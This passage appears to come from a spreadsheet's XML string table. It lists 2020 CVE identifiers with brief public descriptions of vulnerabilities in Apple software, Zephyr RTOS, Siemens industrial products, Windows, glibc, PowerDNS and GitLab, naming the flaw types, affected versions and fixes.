    <t>A use after free issue was addressed with improved memory management. This issue is fixed in watchOS 7.0, iOS 14.0 and iPadOS 14.0, iTunes for Windows 12.10.9, iCloud for Windows 11.5, tvOS 14.0, Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9948</t>
  </si>
  <si>
    <t>A type confusion issue was addressed with improved memory handling. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9949</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.0, iOS 14.0 and iPadOS 14.0, macOS Catalina 10.15.6, Security Update 2020-004 Mojave, Security Update 2020-004 High Sierra, tvOS 14.0. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9950</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in watchOS 7.0, tvOS 14.0, Safari 14.0, iOS 14.0 and iPadOS 14.0. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9951</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9952</t>
  </si>
  <si>
    <t>An input validation issue was addressed with improved input validation. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0, watchOS 7.0, Safari 14.0, iCloud for Windows 11.4, iCloud for Windows 7.21. Processing maliciously crafted web content may lead to a cross site scripting attack.</t>
  </si>
  <si>
    <t>CVE-2020-9954</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in watchOS 7.0, tvOS 14.0, macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave, iOS 14.0 and iPadOS 14.0. Playing a malicious audio file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9955</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in watchOS 7.0, tvOS 14.0, iOS 14.0 and iPadOS 14.0, macOS Big Sur 11.0.1. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9956</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.0.1, tvOS 14.0, macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave, watchOS 7.0, iOS 14.0 and iPadOS 14.0. Processing a maliciously crafted font file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9958</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 14.0 and iPadOS 14.0. An application may be able to cause unexpected system termination or write kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-9959</t>
  </si>
  <si>
    <t>A lock screen issue allowed access to messages on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0. A person with physical access to an iOS device may be able to view notification contents from the lockscreen.</t>
  </si>
  <si>
    <t>CVE-2020-9960</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.0.1, tvOS 14.0, macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave, watchOS 7.0, iOS 14.0 and iPadOS 14.0. Processing a maliciously crafted audio file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9961</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9962</t>
  </si>
  <si>
    <t>A buffer overflow was addressed with improved size validation. This issue is fixed in macOS Big Sur 11.0.1, tvOS 14.0, macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave, watchOS 7.0, iOS 14.0 and iPadOS 14.0. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9963</t>
  </si>
  <si>
    <t>The issue was addressed with improved handling of icon caches. This issue is fixed in macOS Big Sur 11.0.1, iOS 14.0 and iPadOS 14.0. A malicious app may be able to determine the existence of files on the computer.</t>
  </si>
  <si>
    <t>CVE-2020-9964</t>
  </si>
  <si>
    <t>A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 14.0 and iPadOS 14.0. A local user may be able to read kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-9965</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.0, tvOS 14.0, iOS 14.0 and iPadOS 14.0. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9966</t>
  </si>
  <si>
    <t>CVE-2020-9967</t>
  </si>
  <si>
    <t>Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Big Sur 11.0.1, tvOS 14.0, macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave, watchOS 7.0, iOS 14.0 and iPadOS 14.0. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-9968</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 14.0 and iPadOS 14.0, macOS Catalina 10.15.7, tvOS 14.0, watchOS 7.0. A malicious application may be able to access restricted files.</t>
  </si>
  <si>
    <t>CVE-2020-9969</t>
  </si>
  <si>
    <t>An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.0, tvOS 14.0, iOS 14.0 and iPadOS 14.0. A local user may be able to view senstive user information.</t>
  </si>
  <si>
    <t>CVE-2020-9971</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in watchOS 7.0, tvOS 14.0, iOS 14.0 and iPadOS 14.0, macOS Big Sur 11.0.1. A malicious application may be able to elevate privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9972</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 14.0 and iPadOS 14.0. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9973</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave, iOS 14.0 and iPadOS 14.0. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9974</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1, iOS 14.2 and iPadOS 14.2, tvOS 14.2, watchOS 7.1. A malicious application may be able to determine kernel memory layout.</t>
  </si>
  <si>
    <t>CVE-2020-9975</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in macOS Big Sur 11.0.1, tvOS 14.0, macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave, watchOS 7.0, iOS 14.0 and iPadOS 14.0. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9976</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0, watchOS 7.0. A malicious application may be able to leak sensitive user information.</t>
  </si>
  <si>
    <t>CVE-2020-9977</t>
  </si>
  <si>
    <t>A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement. This issue is fixed in macOS Big Sur 11.0.1, iOS 14.0 and iPadOS 14.0. A malicious application may be able to determine a user's open tabs in Safari.</t>
  </si>
  <si>
    <t>CVE-2020-9978</t>
  </si>
  <si>
    <t>This issue was addressed with improved setting propagation. This issue is fixed in macOS Big Sur 11.0.1, tvOS 14.0, macOS Big Sur 11.1, Security Update 2020-001 Catalina, Security Update 2020-007 Mojave, watchOS 7.0, iOS 14.0 and iPadOS 14.0. An attacker in a privileged network position may be able to unexpectedly alter application state.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N</t>
  </si>
  <si>
    <t>CVE-2020-9979</t>
  </si>
  <si>
    <t>A trust issue was addressed by removing a legacy API. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0. An attacker may be able to misuse a trust relationship to download malicious content.</t>
  </si>
  <si>
    <t>CVE-2020-9980</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted font file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9981</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in watchOS 7.0, iOS 14.0 and iPadOS 14.0, iTunes for Windows 12.10.9, iCloud for Windows 11.5, tvOS 14.0, macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave. Processing a maliciously crafted file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9982</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks to prevent unauthorized actions. This issue is fixed in Apple Music 3.4.0 for Android. A malicious application may be able to leak a user's credentials.</t>
  </si>
  <si>
    <t>CVE-2020-9983</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9984</t>
  </si>
  <si>
    <t>CVE-2020-9985</t>
  </si>
  <si>
    <t>CVE-2020-9986</t>
  </si>
  <si>
    <t>A file access issue existed with certain home folder files. This was addressed with improved access restrictions. This issue is fixed in macOS Catalina 10.15.7. A malicious application may be able to read sensitive location information.</t>
  </si>
  <si>
    <t>CVE-2020-9987</t>
  </si>
  <si>
    <t>An inconsistent user interface issue was addressed with improved state management. This issue is fixed in Safari 14.0. Visiting a malicious website may lead to address bar spoofing.</t>
  </si>
  <si>
    <t>CVE-2020-9988</t>
  </si>
  <si>
    <t>The issue was addressed with improved deletion. This issue is fixed in macOS Big Sur 11.0.1, iOS 14.0 and iPadOS 14.0. A local user may be able to discover a user’s deleted messages.</t>
  </si>
  <si>
    <t>CVE-2020-9989</t>
  </si>
  <si>
    <t>The issue was addressed with improved deletion. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.0, iOS 14.0 and iPadOS 14.0. A local user may be able to discover a user’s deleted messages.</t>
  </si>
  <si>
    <t>CVE-2020-9990</t>
  </si>
  <si>
    <t>A race condition was addressed with additional validation. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9991</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.0, iOS 14.0 and iPadOS 14.0, iCloud for Windows 7.21, tvOS 14.0. A remote attacker may be able to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-9992</t>
  </si>
  <si>
    <t>This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7. This issue is fixed in iOS 14.0 and iPadOS 14.0, Xcode 12.0. An attacker in a privileged network position may be able to execute arbitrary code on a paired device during a debug session over the network.</t>
  </si>
  <si>
    <t>CVE-2020-9993</t>
  </si>
  <si>
    <t>The issue was addressed with improved UI handling. This issue is fixed in watchOS 7.0, Safari 14.0, iOS 14.0 and iPadOS 14.0. Visiting a malicious website may lead to address bar spoofing.</t>
  </si>
  <si>
    <t>CVE-2020-9994</t>
  </si>
  <si>
    <t>A path handling issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to overwrite arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-9995</t>
  </si>
  <si>
    <t>An issue existed in the parsing of URLs. This issue was addressed with improved input validation. This issue is fixed in macOS Server 5.11. Processing a maliciously crafted URL may lead to an open redirect or cross site scripting.</t>
  </si>
  <si>
    <t>CVE-2020-9996</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in macOS Big Sur 11.0.1, iOS 14.0 and iPadOS 14.0. A malicious application may be able to elevate privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9997</t>
  </si>
  <si>
    <t>An information disclosure issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6, watchOS 6.2.8. A malicious application may disclose restricted memory.</t>
  </si>
  <si>
    <t>CVE-2020-9999</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1, iTunes for Windows 12.10.9. Processing a maliciously crafted text file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-10012</t>
  </si>
  <si>
    <t>An access issue was addressed with improved access restrictions. This issue is fixed in macOS Big Sur 11.0.1. Processing a maliciously crafted document may lead to a cross site scripting attack.</t>
  </si>
  <si>
    <t>CVE-2020-10013</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in tvOS 14.0, iOS 14.0 and iPadOS 14.0. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-10014</t>
  </si>
  <si>
    <t>A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Big Sur 11.0.1. A malicious application may be able to break out of its sandbox.</t>
  </si>
  <si>
    <t>CVE-2020-10015</t>
  </si>
  <si>
    <t>CVE-2020-10016</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1, iOS 14.2 and iPadOS 14.2, tvOS 14.2, watchOS 7.1. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-10017</t>
  </si>
  <si>
    <t>CVE-2020-10018</t>
  </si>
  <si>
    <t>WebKitGTK through 2.26.4 and WPE WebKit through 2.26.4 (which are the versions right before 2.28.0) contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. This issue has been fixed in 2.28.0 with improved memory handling.</t>
  </si>
  <si>
    <t>CVE-2020-10019</t>
  </si>
  <si>
    <t>USB DFU has a potential buffer overflow where the requested length (wLength) is not checked against the buffer size. This could be used by a malicious USB host to exploit the buffer overflow. See NCC-ZEP-002 This issue affects: zephyrproject-rtos zephyr version 1.14.1 and later versions. version 2.1.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-1002</t>
  </si>
  <si>
    <t>CVE-2020-10021</t>
  </si>
  <si>
    <t>Out-of-bounds Write in the USB Mass Storage memoryWrite handler with unaligned Sizes See NCC-ZEP-024, NCC-ZEP-025, NCC-ZEP-026 This issue affects: zephyrproject-rtos zephyr version 1.14.1 and later versions. version 2.1.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10022</t>
  </si>
  <si>
    <t>A malformed JSON payload that is received from an UpdateHub server may trigger memory corruption in the Zephyr OS. This could result in a denial of service in the best case, or code execution in the worst case. See NCC-NCC-016 This issue affects: zephyrproject-rtos zephyr version 2.1.0 and later versions. version 2.2.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10023</t>
  </si>
  <si>
    <t>The shell subsystem contains a buffer overflow, whereby an adversary with physical access to the device is able to cause a memory corruption, resulting in denial of service or possibly code execution within the Zephyr kernel. See NCC-NCC-019 This issue affects: zephyrproject-rtos zephyr version 1.14.0 and later versions. version 2.1.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10024</t>
  </si>
  <si>
    <t>The arm platform-specific code uses a signed integer comparison when validating system call numbers. An attacker who has obtained code execution within a user thread is able to elevate privileges to that of the kernel. See NCC-ZEP-001 This issue affects: zephyrproject-rtos zephyr version 1.14.0 and later versions. version 2.1.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10027</t>
  </si>
  <si>
    <t>An attacker who has obtained code execution within a user thread is able to elevate privileges to that of the kernel. See NCC-ZEP-001 This issue affects: zephyrproject-rtos zephyr version 1.14.0 and later versions. version 2.1.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10028</t>
  </si>
  <si>
    <t>Multiple syscalls with insufficient argument validation See NCC-ZEP-006 This issue affects: zephyrproject-rtos zephyr version 1.14.0 and later versions. version 2.1.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10029</t>
  </si>
  <si>
    <t>The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.</t>
  </si>
  <si>
    <t>CVE-2020-1003</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0913, CVE-2020-1000, CVE-2020-1027.</t>
  </si>
  <si>
    <t>CVE-2020-10030</t>
  </si>
  <si>
    <t>An issue has been found in PowerDNS Recursor 4.1.0 up to and including 4.3.0. It allows an attacker (with enough privileges to change the system's hostname) to cause disclosure of uninitialized memory content via a stack-based out-of-bounds read. It only occurs on systems where gethostname() does not have '\0' termination of the returned string if the hostname is larger than the supplied buffer. (Linux systems are not affected because the buffer is always large enough. OpenBSD systems are not affected because the returned hostname always has '\0' termination.) Under some conditions, this issue can lead to the writing of one '\0' byte out-of-bounds on the stack, causing a denial of service or possibly arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-10037</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SICAM MMU (All versions &lt; V2.05), SICAM SGU (All versions), SICAM T (All versions &lt; V2.18). By performing a flooding attack against the web server, an attacker might be able to gain read access to the device's memory, possibly revealing confidential information.</t>
  </si>
  <si>
    <t>CVE-2020-10038</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SICAM MMU (All versions &lt; V2.05), SICAM SGU (All versions), SICAM T (All versions &lt; V2.18). An attacker with access to the device's web server might be able to execute administrative commands without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-10039</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SICAM MMU (All versions &lt; V2.05), SICAM SGU (All versions), SICAM T (All versions &lt; V2.18). An attacker in a privileged network position between a legitimate user and the web server might be able to conduct a Man-in-the-middle attack and gain read and write access to the transmitted data.</t>
  </si>
  <si>
    <t>CVE-2020-1004</t>
  </si>
  <si>
    <t>CVE-2020-10040</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SICAM MMU (All versions &lt; V2.05), SICAM SGU (All versions), SICAM T (All versions &lt; V2.18). An attacker with local access to the device might be able to retrieve some passwords in clear text.</t>
  </si>
  <si>
    <t>CVE-2020-10041</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SICAM MMU (All versions &lt; V2.05), SICAM SGU (All versions), SICAM T (All versions &lt; V2.18). A stored Cross-Site-Scripting (XSS) vulnerability is present in different locations of the web application. An attacker might be able to take over a session of a legitimate user.</t>
  </si>
  <si>
    <t>CVE-2020-10042</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SICAM MMU (All versions &lt; V2.05), SICAM SGU (All versions), SICAM T (All versions &lt; V2.18). A buffer overflow in various positions of the web application might enable an attacker with access to the web application to execute arbitrary code over the network.</t>
  </si>
  <si>
    <t>CVE-2020-10043</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SICAM MMU (All versions &lt; V2.05), SICAM SGU (All versions), SICAM T (All versions &lt; V2.18). The web server could allow Cross-Site Scripting (XSS) attacks if unsuspecting users are tricked into accessing a malicious link.</t>
  </si>
  <si>
    <t>CVE-2020-10044</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SICAM MMU (All versions &lt; V2.05), SICAM SGU (All versions), SICAM T (All versions &lt; V2.18). An attacker with access to the network could be able to install specially crafted firmware to the device.</t>
  </si>
  <si>
    <t>CVE-2020-10045</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SICAM MMU (All versions &lt; V2.05), SICAM SGU (All versions), SICAM T (All versions &lt; V2.18). An error in the challenge-response procedure could allow an attacker to replay authentication traffic and gain access to protected areas of the web application.</t>
  </si>
  <si>
    <t>CVE-2020-10048</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC PCS 7 (All versions), SIMATIC WinCC (All versions &lt; V7.5 SP2). Due to an insecure password verification process, an attacker could bypass the password protection set on protected files, thus being granted access to the protected content, circumventing authentication.</t>
  </si>
  <si>
    <t>CVE-2020-10049</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC RTLS Locating Manager (All versions &lt; V2.10.2). The start-stop scripts for the services of the affected application could allow a local attacker to include arbitrary commands that are executed when services are started or stopped interactively by system administrators.</t>
  </si>
  <si>
    <t>CVE-2020-1005</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory, aka 'Microsoft Graphics Component Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0982, CVE-2020-0987.</t>
  </si>
  <si>
    <t>CVE-2020-10050</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC RTLS Locating Manager (All versions &lt; V2.10.2). The directory of service executables of the affected application could allow a local attacker to include arbitrary commands that are executed with SYSTEM privileges when the system restarts.</t>
  </si>
  <si>
    <t>CVE-2020-10051</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC RTLS Locating Manager (All versions &lt; V2.10.2). Multiple services of the affected application are executed with SYSTEM privileges while the call path is not quoted. This could allow a local attacker to inject arbitrary commands that are execeuted instead of the legitimate service.</t>
  </si>
  <si>
    <t>CVE-2020-10052</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC RTLS Locating Manager (All versions &lt; V2.12). The affected application writes sensitive data, such as usernames and passwords in log files. A local attacker with access to the log files could use this information to launch further attacks.</t>
  </si>
  <si>
    <t>CVE-2020-10053</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC RTLS Locating Manager (All versions &lt; V2.12). The affected application writes sensitive data, such as database credentials in configuration files. A local attacker with access to the configuration files could use this information to launch further attacks.</t>
  </si>
  <si>
    <t>CVE-2020-10054</t>
  </si>
  <si>
    <t>A vulnerability has been identified in SIMATIC RTLS Locating Manager (All versions &lt; V2.12). The affected application does not properly handle the import of large configuration files. A local attacker could import a specially crafted file which could lead to a denial-of-service condition of the application service.</t>
  </si>
  <si>
    <t>CVE-2020-10055</t>
  </si>
  <si>
    <t>A vulnerability has been identified in Desigo CC (V4.x), Desigo CC (V3.x), Desigo CC Compact (V4.x), Desigo CC Compact (V3.x). Affected applications are delivered with a 3rd party component (BIRT) that contains a remote code execution vulnerability if the Advanced Reporting Engine is enabled. The vulnerability could allow a remote unauthenticated attacker to execute arbitrary commands on the server with SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2020-10056</t>
  </si>
  <si>
    <t>A vulnerability has been identified in License Management Utility (LMU) (All versions &lt; V2.4). The lmgrd service of the affected application is executed with local SYSTEM privileges on the server while its configuration can be modified by local users. The vulnerability could allow a local authenticated attacker to execute arbitrary commands on the server with local SYSTEM privileges.</t>
  </si>
  <si>
    <t>CVE-2020-10057</t>
  </si>
  <si>
    <t>GeniXCMS 1.1.7 is vulnerable to user privilege escalation due to broken access control. This issue exists because of an incomplete fix for CVE-2015-2680, in which "token" is used as a CSRF protection mechanism, but without validation that "token" is associated with an administrative user.</t>
  </si>
  <si>
    <t>CVE-2020-10058</t>
  </si>
  <si>
    <t>Multiple syscalls in the Kscan subsystem perform insufficient argument validation, allowing code executing in userspace to potentially gain elevated privileges. See NCC-ZEP-006 This issue affects: zephyrproject-rtos zephyr version 2.1.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10059</t>
  </si>
  <si>
    <t>The UpdateHub module disables DTLS peer checking, which allows for a man in the middle attack. This is mitigated by firmware images requiring valid signatures. However, there is no benefit to using DTLS without the peer checking. See NCC-ZEP-018 This issue affects: zephyrproject-rtos zephyr version 2.1.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-1006</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists in the way the Windows Push Notification Service handles objects in memory, aka 'Windows Push Notification Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0940, CVE-2020-1001, CVE-2020-1017.</t>
  </si>
  <si>
    <t>CVE-2020-10060</t>
  </si>
  <si>
    <t>In updatehub_probe, right after JSON parsing is complete, objects\[1] is accessed from the output structure in two different places. If the JSON contained less than two elements, this access would reference unitialized stack memory. This could result in a crash, denial of service, or possibly an information leak. Provided the fix in CVE-2020-10059 is applied, the attack requires compromise of the server. See NCC-ZEP-030 This issue affects: zephyrproject-rtos zephyr version 2.1.0 and later versions. version 2.2.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10061</t>
  </si>
  <si>
    <t>Improper handling of the full-buffer case in the Zephyr Bluetooth implementation can result in memory corruption. This issue affects: zephyrproject-rtos zephyr version 2.2.0 and later versions, and version 1.14.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10062</t>
  </si>
  <si>
    <t>An off-by-one error in the Zephyr project MQTT packet length decoder can result in memory corruption and possible remote code execution. NCC-ZEP-031 This issue affects: zephyrproject-rtos zephyr version 2.2.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10063</t>
  </si>
  <si>
    <t>A remote adversary with the ability to send arbitrary CoAP packets to be parsed by Zephyr is able to cause a denial of service. This issue affects: zephyrproject-rtos zephyr version 2.2.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10064</t>
  </si>
  <si>
    <t>Improper Input Frame Validation in ieee802154 Processing. Zephyr versions &gt;= v1.14.2, &gt;= v2.2.0 contain Stack-based Buffer Overflow (CWE-121), Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-3gvq-h42f-v3c7</t>
  </si>
  <si>
    <t>CVE-2020-10065</t>
  </si>
  <si>
    <t>Missing Size Checks in Bluetooth HCI over SPI. Zephyr versions &gt;= v1.14.2, &gt;= v2.2.0 contain Improper Handling of Length Parameter Inconsistency (CWE-130). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-hg2w-62p6-g67c</t>
  </si>
  <si>
    <t>CVE-2020-10066</t>
  </si>
  <si>
    <t>Incorrect Error Handling in Bluetooth HCI core. Zephyr versions &gt;= v1.14.2, &gt;= v2.2.0 contain NULL Pointer Dereference (CWE-476). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-gc66-xfrc-24qr</t>
  </si>
  <si>
    <t>CVE-2020-10067</t>
  </si>
  <si>
    <t>A malicious userspace application can cause a integer overflow and bypass security checks performed by system call handlers. The impact would depend on the underlying system call and can range from denial of service to information leak to memory corruption resulting in code execution within the kernel. See NCC-ZEP-005 This issue affects: zephyrproject-rtos zephyr version 1.14.1 and later versions. version 2.1.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10068</t>
  </si>
  <si>
    <t>In the Zephyr project Bluetooth subsystem, certain duplicate and back-to-back packets can cause incorrect behavior, resulting in a denial of service. This issue affects: zephyrproject-rtos zephyr version 2.2.0 and later versions, and version 1.14.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10069</t>
  </si>
  <si>
    <t>Zephyr Bluetooth unchecked packet data results in denial of service. Zephyr versions &gt;= v1.14.2, &gt;= v2.2.0 contain Improper Handling of Parameters (CWE-233). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-f6vh-7v4x-8fjp</t>
  </si>
  <si>
    <t>CVE-2020-1007</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory, aka 'Windows Kernel Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0821.</t>
  </si>
  <si>
    <t>CVE-2020-10070</t>
  </si>
  <si>
    <t>In the Zephyr Project MQTT code, improper bounds checking can result in memory corruption and possibly remote code execution. NCC-ZEP-031 This issue affects: zephyrproject-rtos zephyr version 2.2.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10071</t>
  </si>
  <si>
    <t>The Zephyr MQTT parsing code performs insufficient checking of the length field on publish messages, allowing a buffer overflow and potentially remote code execution. NCC-ZEP-031 This issue affects: zephyrproject-rtos zephyr version 2.2.0 and later versions.</t>
  </si>
  <si>
    <t>CVE-2020-10072</t>
  </si>
  <si>
    <t>Improper Handling of Insufficient Permissions or Privileges in zephyr. Zephyr versions &gt;= v1.14.2, &gt;= v2.2.0 contain Improper Handling of Insufficient Permissions or Privileges (CWE-280). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-vf79-hqwm-w4xc</t>
  </si>
  <si>
    <t>CVE-2020-10073</t>
  </si>
  <si>
    <t>GitLab EE 12.4.2 through 12.8.1 allows Denial of Service. It was internally discovered that a potential denial of service involving permissions checks could impact a project home page.</t>
  </si>
  <si>
    <t>CVE-2020-10074</t>
  </si>
  <si>
    <t>GitLab 10.1 through 12.8.1 has Incorrect Access Control. A scenario was discovered in which a GitLab account could be taken over through an expired link.</t>
  </si>
